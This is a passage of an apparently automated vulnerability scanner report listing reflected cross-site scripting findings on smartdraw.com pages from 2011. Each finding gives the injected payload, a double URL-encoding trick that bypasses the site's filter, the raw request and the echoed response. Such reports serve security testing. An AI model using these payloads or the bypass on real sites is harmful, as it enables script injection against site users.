1.181. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a was submitted in the REST URL parameter 3. This input was echoed as 5919c"style="x:expression(alert(1))"d2a7fce664a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=obr3du45zbuce445aaaygqnk; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/5919c"style="x:expression(alert(1))"d2a7fce664a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.182. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 was submitted in the REST URL parameter 3. This input was echoed as 6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/buy-sd.htm6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1q0jrzerd2axjnu1z4yq5c55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8830
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/buy-sd.htm6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9" rel="nofollow" target="_blank">
...[SNIP]...

1.183. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670 was submitted in the REST URL parameter 3. This input was echoed as 2c172"><script>alert(1)</script>9f436bf2670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/buy-sd.htm2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iunkdq55f4mrs0zhymery055; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/buy-sd.htm2c172"><script>alert(1)</script>9f436bf2670?id=343769/x22/x3eBuy" rel="nofollow" target="_blank">
...[SNIP]...

1.184. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75 was submitted in the REST URL parameter 3. This input was echoed as 1b6e6"><script>alert(1)</script>255e7c83b75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:30 GMT
Content-Length: 8886
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c2zv45jn1eebgs45s0y1xfqm; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/1b6e6"><script>alert(1)</script>255e7c83b75/?id=343769/x22/x3eBuy&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; wid
...[SNIP]...

1.185. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420fb"><script>alert(1)</script>680e9c0cc7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3enuo2fogmjygz45lfufc045; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=8FB08E7B-DF57-4420-AED4-F6407D658796; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10157
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

1.186. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e89d"><script>alert(1)</script>e8ef8708314 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=amgihnv3fyp5ce55ycrm2svx; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=EE627197-7ED3-4E70-8C64-7A860D1C1696; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10283
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314" rel="nofollow" target="_blank">
...[SNIP]...

1.187. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaa"><script>alert(1)</script>366bac39d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:10 GMT
Content-Length: 10157
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uqbmzijkk42bap45gozgoazf; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=E585BCC2-52CC-4BB6-9195-07613BE89FFC; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.188. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f2b"><script>alert(1)</script>00c78a59a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esic0f55gc0skj45f2frl0ij; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=8C687E7D-B3C3-4B52-B907-A04D7B32366C; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10157
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1" rel="nofollow" target="_blank">
...[SNIP]...

1.189. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8 was submitted in the REST URL parameter 2. This input was echoed as fff10"><script>alert(1)</script>a7102c9c5a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/smartdraw.aspfff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1kyde4v2dk5z4w45pkuoyr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/smartdraw.aspfff10"><script>alert(1)</script>a7102c9c5a8?id=104640/x22" rel="nofollow" target="_blank">
...[SNIP]...

1.190. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217 was submitted in the REST URL parameter 2. This input was echoed as 1fb77"><script>alert(1)</script>1ed6dd36217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rgc5ewevo3ic5ebzjtk3pcfy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8816
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/1fb77"><script>alert(1)</script>1ed6dd36217/?id=104640/x22&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500p
...[SNIP]...

1.191. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a was submitted in the REST URL parameter 2. This input was echoed as 16ab3"style="x:expression(alert(1))"63feb98e41a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xznk3xfpvt4fwq45lltljxjn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8746
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/16ab3"style="x:expression(alert(1))"63feb98e41a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.192. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 was submitted in the REST URL parameter 2. This input was echoed as 46591"style="x:expression(alert(1))"94313ed1278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2ksoxp55cqqywc453rftb3vt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8746
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/46591"style="x:expression(alert(1))"94313ed1278/" rel="nofollow" target="_blank">
...[SNIP]...

1.193. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9eb8"><script>alert(1)</script>02409d83cd8 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
